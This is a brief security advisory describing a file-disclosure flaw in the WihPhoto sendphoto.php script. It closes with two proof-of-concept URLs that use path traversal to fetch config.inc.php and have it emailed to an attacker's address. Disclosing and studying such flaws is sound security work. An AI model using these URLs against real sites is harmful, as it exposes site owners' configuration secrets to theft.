11 lines
No EOL
635 B
Text
11 lines
No EOL
635 B
Text
source: https://www.securityfocus.com/bid/6929/info
|
|
|
|
A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.
|
|
|
|
The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.
|
|
|
|
An attacker can exploit this vulnerability and specify arbitrary files as the parameters to the variables. This will cause WihPhoto to send an email with the attacker-specified file as an attachment.
|
|
|
|
|
|
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
|
|
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1 |